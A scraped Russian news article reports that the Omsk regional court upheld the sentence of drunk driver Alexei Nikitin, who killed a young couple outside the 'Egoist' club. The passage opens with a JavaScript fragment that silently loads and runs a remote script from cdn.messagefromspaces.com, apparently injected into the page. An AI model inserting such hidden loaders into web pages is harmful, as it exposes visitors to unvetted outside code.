, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
7 февраля, 2013 События

Виновнику ДТП у «Эгоиста» не удалось добиться смягчения наказания

Виновнику ДТП у «Эгоиста» не удалось добиться смягчения наказания

Кассация Омского облсуда оставила без изменений приговор в отношении Алексея Никитина, который насмерть сбил у клуба «Эгоист» молодую пару. Осужденный пытался добиться сокращения срока лишения свободы и уменьшения суммы морального вреда, который составил 6 млн рублей. Однако суд не счел это возможным, и приговор вступил в законную силу.

Напомним, что ДТП у клуба «Эгоист» произошло в ночь на 12 октября. Внештатный работник компании «Транссибнефть» Алексей Никитин сбил двух человек – 20-летнюю Ксению Ренжину и 26-летнего Артема Аппакова. Мужчина был пьян, не справился с управлением, и его Renault Megane выехал на тротуар. Ксения погибла сразу, Артем скончался в больнице через несколько часов. Во время следствия Никитин свою вину не признавал. В соцсети «ВКонтакте» в подтверждение этому выложили видеозапись, где подозреваемый утверждает, что «он ничего не помнит и вообще не сидел за рулем». В ходе предварительного следствия мужчине было предъявлено обвинение по факту нарушения Правил дорожного движения в состоянии опьянения, повлекшее смерть двух человек. Трагедия получила широкий общественный резонанс. Омичи, шокированные страшным ДТП, решив выразить протест против управления автомобилем в нетрезвом виде, провели в Омске автопробег, посвященный памяти погибшей молодой пары. В акции участвовало около 200 автомобилей. В итоге Никитин вину признал, но с оговоркой, что «все равно ничего не помнит». Первомайский районный суд приговорил его к 5 годам 11 месяцам лишения свободы и обязал компенсировать родственникам погибших моральный ущерб в 6 млн рублей. Никитин приговор обжаловал.

Как сообщила пресс-секретарь Омского областного суда Юлия Соколенко, кассационная комиссия облсуда оставила приговор без изменения.

«Никитин обжаловал приговор по всем пунктам: по режиму, сроку и моральному ущербу. Однако кассационная комиссия оставила его жалобу без удовлетворения. Приговор вступил в законную силу», – сказала Юлия Соколенко.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: События